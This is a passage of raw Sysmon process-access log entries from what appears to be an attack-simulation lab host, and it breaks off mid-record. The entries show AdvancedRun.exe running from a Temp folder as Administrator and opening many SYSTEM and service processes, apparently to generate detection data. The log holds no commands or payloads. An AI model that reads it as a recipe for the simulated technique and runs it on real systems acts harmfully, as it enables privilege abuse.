18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004008573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004008571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008570Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004008569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004008568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004008567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Loc